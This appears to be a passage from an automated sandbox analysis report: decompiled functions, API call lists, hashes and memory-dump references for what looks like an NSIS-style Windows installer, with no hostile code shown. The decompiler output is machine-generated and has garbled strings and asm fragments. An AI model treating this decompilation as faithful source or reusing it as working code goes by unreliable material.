0x00403c45
0x00403c12
0x00403c16
0x00403c1b
0x00403c1d
0x00000000
0x00000000
0x00403c2d
0x00403c35
0x00000000
0x00403c3b
0x00403a69
0x00403a69
0x00403a6d
0x00403a72
0x00403a81
0x00403a81
0x00403a8a
0x00403a93
0x00403a9e
0x00403a9e
0x00403aaa
0x00403ac6
0x00403ac9
0x00403adc
0x00403ae2
0x00403b85
0x00000000
0x00403b8e
0x00403ae8
0x00403af5
0x00403af7
0x00403af9
0x00403b18
0x00403b18
0x00403b1b
0x00403b20
0x00403b23
0x00403b33
0x00403b34
0x00403b36
0x00403b6c
0x00403b7f
0x00000000
0x00403b7f
0x00403b38
0x00403b3e
0x00403b57
0x00403b5c
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b4c
0x00403b4c
0x00403b4e
0x00403b4e
0x00000000
0x00403b4e
0x00403b41
0x00403b46
0x00000000
0x00403b46
0x00403b25
0x00403b2b
0x00000000
0x00000000
0x00403b2d
0x00000000
0x00403b2d
0x00403b1d
0x00000000
0x00403b1d
0x00403b03
0x00403b0a
0x00403b10
0x00403b12
0x00000000
0x00000000
0x00000000
0x00403b12
0x00403ace
0x00000000
0x00403aac
0x00403ab2
0x00403abc
0x00403ec2
0x00403ec8
0x00403ed5
0x00403edb
0x00403edb
0x00403ee5
0x00000000
0x00403ee5
0x00403aaa

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
ShowWindow.USER32(?), ref: 00403A9E
DestroyWindow.USER32 ref: 00403AB2
SetWindowLongA.USER32 ref: 00403ACE
GetDlgItem.USER32 ref: 00403AEF
SendMessageA.USER32 ref: 00403B03
IsWindowEnabled.USER32(00000000), ref: 00403B0A
GetDlgItem.USER32 ref: 00403BB8
GetDlgItem.USER32 ref: 00403BC2
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
SendMessageA.USER32 ref: 00403C2D
GetDlgItem.USER32 ref: 00403CD3
ShowWindow.USER32(00000000,?), ref: 00403CF4
EnableWindow.USER32(?,?), ref: 00403D06
EnableWindow.USER32(?,?), ref: 00403D21
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
EnableMenuItem.USER32 ref: 00403D3E
SendMessageA.USER32 ref: 00403D56
SendMessageA.USER32 ref: 00403D69
lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
ShowWindow.USER32(?,0000000A), ref: 00403ED5

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

0x00404070
0x00404196
0x004041f2
0x004041f6
0x004042cd
0x004042cf
0x004042cf
0x004042d5
0x004042d5
0x004042d8
0x00000000
0x004042df
0x00404204
0x00404206
0x00404210
0x0040421b
0x0040421e
0x00404221
0x0040422c
0x0040422f
0x00404236
0x00404244
0x0040425c
0x00404264
0x0040426f
0x0040427f
0x00404281
0x00404281
0x00404236
0x0040428b
0x00000000
0x00404296
0x0040429a
0x004042ab
0x004042ab
0x004042b1
0x004042bf
0x004042bf
0x00000000
0x004042c3
0x0040428b
0x004041a1
0x00000000
0x004041b5
0x004041bb
0x004041c1
0x00000000
0x00000000
0x004041e6
0x004041e8
0x004041ed
0x00000000
0x004041ed
0x004041a1
0x00404076
0x00404079
0x0040407e
0x0040408f
0x0040408f
0x00404096
0x00404099
0x0040409b
0x004040a0
0x004040a9
0x004040af
0x004040bb
0x004040be
0x004040c7
0x004040cc
0x004040cf
0x004040d4
0x004040eb
0x004040f2
0x00404105
0x00404108
0x0040411d
0x00404124
0x00404129
0x0040412e
0x0040412e
0x0040413d
0x0040414c
0x0040414e
0x00404164
0x00404173
0x00404175
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
GetDlgItem.USER32 ref: 004040FF
SendMessageA.USER32 ref: 0040411D
GetSysColor.USER32(?), ref: 0040412E
SendMessageA.USER32 ref: 0040413D
SendMessageA.USER32 ref: 0040414C
lstrlenA.KERNEL32(?), ref: 00404156
SendMessageA.USER32 ref: 00404164
SendMessageA.USER32 ref: 00404173
GetDlgItem.USER32 ref: 004041D6
SendMessageA.USER32 ref: 004041D9
GetDlgItem.USER32 ref: 00404204
SendMessageA.USER32 ref: 00404244
LoadCursorA.USER32 ref: 00404253
SetCursor.USER32(00000000), ref: 0040425C
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
LoadCursorA.USER32 ref: 0040427C
SetCursor.USER32(00000000), ref: 0040427F
SendMessageA.USER32 ref: 004042AB
SendMessageA.USER32 ref: 004042BF

Strings

open, xrefs: 00404267
N, xrefs: 004041F2
@.B, xrefs: 00404264

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004058ba
0x004058c1
0x004058c5
0x004058ce
0x004058d2
0x00405a11
0x00405a11
0x00000000
0x00405a11
0x004058d2
0x004058de
0x004058f4
0x0040591c
0x00405927
0x0040592b
0x0040594b
0x00405952
0x0040595c
0x00405969
0x0040596e
0x00405973
0x00405977
0x00000000
0x00000000
0x00405986
0x00405988
0x00405995
0x00405999
0x00405a0a
0x00405a0b
0x00000000
0x004059b5
0x004059c2
0x00405a27
0x00405a2e
0x004059d5
0x004059d5
0x004059d7
0x004059e0
0x004059eb
0x004059fd
0x00405a04
0x00000000
0x00405a04
0x00405a30
0x00405a31
0x00405a36
0x00405a38
0x00405a45
0x00405a45
0x00405a49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a3a
0x00405a3a
0x00405a3d
0x00405a40
0x00405a41
0x00000000
0x00405a3a
0x004059cd
0x004059d2
0x00000000
0x004059d2
0x00405999
0x004058f6
0x00405901
0x0040590a
0x0040590e
0x00000000
0x00000000
0x0040590e
0x00405a1b

APIs

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
GetShortPathNameA.KERNEL32 ref: 0040590A
GetShortPathNameA.KERNEL32 ref: 00405927
wsprintfA.USER32 ref: 00405945
GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
GlobalFree.KERNEL32 ref: 00405A04
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B

Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9

Strings

%s=%s, xrefs: 0040593B
[Rename], xrefs: 004059B5, 004059C7
0&B, xrefs: 004058EF

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$0&B$[Rename]
API String ID: 3772915668-951905037
Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 733524D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E733524D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73351215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73352626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7335307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7335309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73351429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7335405c);
								goto L17;
							case 4:
								__ecx =  *0x7335405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7335405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {<u@u<u"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7335405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73354000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E733512D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73351266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x733524e4
0x733524e6
0x733524f0
0x733524f6
0x73352500
0x73352504
0x73352509
0x73352509
0x73352511
0x73352518
0x7335251e
0x00000000
0x73352525
0x00000000
0x00000000
0x7335252c
0x73352530
0x73352533
0x73352537
0x7335253e
0x73352542
0x73352548
0x7335254a
0x7335254c
0x7335254c
0x73352553
0x00000000
0x00000000
0x7335255c
0x00000000
0x00000000
0x7335256c
0x00000000
0x00000000
0x73352598
0x733525a0
0x733525aa
0x733525ac
0x733525b1
0x00000000
0x00000000
0x73352574
0x73352578
0x7335257a
0x7335257b
0x7335257d
0x7335258d
0x73352594
0x00000000
0x00000000
0x733525b7
0x733525b9
0x733525bf
0x733525c5
0x733525c5
0x00000000
0x00000000
0x7335251e
0x733525c8
0x733525c8
0x733525cd
0x733525de
0x733525de
0x733525e4
0x733525e9
0x733525ee
0x733525fa
0x733525ff
0x00000000
0x73352604
0x733525f0
0x733525f1
0x73352605
0x73352605
0x733525ee
0x73352606
0x7335260a
0x7335260d
0x73352625

APIs

Part of subcall function 73351215: GlobalAlloc.KERNELBASE(00000040,73351233,?,733512CF,-7335404B,733511AB,-000000A0), ref: 7335121D

GlobalFree.KERNEL32 ref: 733525DE
GlobalFree.KERNEL32 ref: 73352618

Strings

{<u@u<u, xrefs: 7335257D

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID: {<u@u<u
API String ID: 1780285237-2852364109
Opcode ID: 6daf19f9d30f785884772bf08612e586e4f534ca3eeb73aa43508d160f0cf92b
Instruction ID: d03d0963763f89fc866be3e6fc07e9a113e0248c8d97f69c6788d87e61957e33
Opcode Fuzzy Hash: 6daf19f9d30f785884772bf08612e586e4f534ca3eeb73aa43508d160f0cf92b
Instruction Fuzzy Hash: B041EF73504208EFE7369F75CC94F2AB7BEEB85210B24492DF546D3140DB399908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 733522F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E733522F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E733512AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7335123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7335247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E733512FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E733512FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73351224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7335405c =  *0x7335405c +  *0x7335405c;
									__edi = GlobalAlloc(0x40,  *0x7335405c +  *0x7335405c);
									 *0x7335405c = MultiByteToWideChar(0, 0, __ebx,  *0x7335405c, __edi,  *0x7335405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
